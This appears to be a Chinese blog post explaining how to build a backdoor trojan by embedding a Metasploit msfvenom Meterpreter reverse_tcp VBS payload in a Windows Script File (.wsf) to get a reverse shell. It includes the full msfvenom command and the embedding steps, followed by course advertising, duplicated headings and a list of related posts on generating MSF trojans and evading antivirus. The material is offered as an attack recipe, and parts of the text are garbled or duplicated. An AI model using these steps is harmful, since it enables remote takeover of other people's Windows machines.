**

网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

**
首先了解wsf是啥语言,可参考文章如下:

https://www.cnblogs.com/vitrox/p/5137441.html
https://blog.csdn.net/leyvan/article/details/3746683
http://book.51cto.com/art/201111/300472.htm

wsf脚本语言是Windows 脚本文件,是含有可扩展标记语言 (XML),支持javascript和vbs,

Include 语句将函数从 VBScript 或 JScript 文件合并到 Windows 脚本宿主项目中。

wsf后门思路

1)学习.wsf脚本格式

2)msf生成vbs

  1. msf生成vbs插入.wsf脚本格式

4)尝试运行查看是否报错

5)反弹shell

开始制作脚本:

1) .wsf脚本格式

2) msf生成vbs

msfvenom -pwindows/meterpreter/reverse_tcp LHOST= lport=  EXITFUNC=thread -f vbs--platform win > test.vbs

复制

3) msf生成vbs插入.wsf脚本中

4)尝试运行无查看是否报错:

直接运行无报错

使用cscript.exe (WindowsScript Host引擎),运行无报错:

5)反弹shell

监听:

反弹:

知识补充:

网络安全成长路线图

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成hei客大神,这个方向越往后,需要学习和掌握的东西就会越来越多,以下是学习网络安全需要走的方向:

# 网络安全学习方法

​ 上面介绍了技术分类和学习路线,这里来谈一下学习方法:
​ ## 视频学习

d59b5f63c5e626f914.png)

# 网络安全学习方法

​ 上面介绍了技术分类和学习路线,这里来谈一下学习方法:
​ ## 视频学习

​ 无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

msf 生成.wsf 木马相关推荐

  1. MSF生成一个木马与使用

    原理: 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用测试机打开,攻击成功后,就渗透到了靶机系统中. 准备: 目标:win7 x64专业版 攻击主机:Kali IP:192.16 ...

  2. MSF生成windows木马

    msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 生成exe木马 msfvenom ...

  3. vb6.0 生成exe被简称是木马_使用MSF渗透框架生成PHP木马并实现控制远程服务器

    一.背景介绍 Metasploit就是一个漏洞框架.它的全称叫做The Metasploit Framework,简称叫做MSF.Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强 ...

  4. MSF生成木马及木马的简单使用

    0x00 前言 本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正. 由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVE ...

  5. MSF(2)——各种木马的生成及简单的免杀

    本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 文章目录 前文链接 木马生成 免杀 php 免杀 Python 免杀 分析木马文件 编写免杀马 打包exe 前文链接 WAMP/DVWA/sql ...

  6. MSF生成木马渗透WIN7

    文章目录 1.生成木马 2.启动msfconsole 3.后门操作 3.1 文件(文件,目录等)操作 3.2 网络命令(net等)操作 3.3 系统命令(权限,用户,用户组等)操作 3.4 压缩工具( ...

  7. msf安卓手机木马实战要点整理

    Msf手机木马高级选项设置说明 Androidwakelock  阻止手机休眠以便处理耗时操作 AutoUnhookProcess  ? AutoVerifySession        自动验证删除 ...

  8. 渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)

    MsfVenom 首先msf就是Metaaploit,venom就是病毒.msfvenom是msfpayload和msfencode的组合.将这两个工具集成在一个框架实例中.进一步来说,msfveno ...

  9. mysql定时木马_Mysql的语句生成后门木马的方法

    咳咳,大家看看就好了,本人不负责所产生的后果 复制代码 代码如下: SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702 ...

最新文章

  1. 【CV】Anaconda 安装教程|CSDN创作打卡
  2. Windows Phone开发(48):不可或缺的本地数据库
  3. android studio中能用的各种转义字符
  4. linux下编译软件通用方法(memcached为例)
  5. arguments使用
  6. linux创建vnc服务器,五步建立一个VNC Linux服务器
  7. 前端代码的整洁之道 | 技术头条
  8. 计算机启动过程:MBR和BIOS
  9. photoshop 快捷键学习笔记
  10. 用ArcGIS Server服务Print打印高清大图的关键参数
  11. DNS 服务器 清除缓存
  12. 在轮询系统如何将A站订单在B站自动建立,并调用B站产品
  13. Linux系统管理员:不要害怕升级内核
  14. 数据库索引的创建以及常见优化
  15. 基于51单片机的数字频率计设计
  16. excel 工具的使用---导入txt数据
  17. 【新版】Inventor二次开发学习指南
  18. inode、软链接与硬链接
  19. 第二章 大数据量场景加速绘制基本原理与方法
  20. 【已解决】svchost(Delivery Optimization)一直不停下载(占带宽、吃流量)

热门文章

  1. 重磅爆料:APEX手游今日开测,小众游戏能否打开国内吃鸡手游市场?
  2. 【Python计量】联立方程模型
  3. OpenCV中cv2的用法
  4. 关于Layabox发布的OPPO小游戏程序出错在谷歌浏览器上无报错的解决方案
  5. 逻辑斯蒂回归 - 多项式回归
  6. 【OJ每日一练】1010 - 找出二五仔的ID
  7. 《Interaction-Free Calibration for Optical See-Through Head-Mounted Displays...》论文阅读
  8. PHP laravolt/avatar 生成中文头像
  9. 零拷贝技术:mmap和sendfile
  10. Java中等于号,传值和传址区别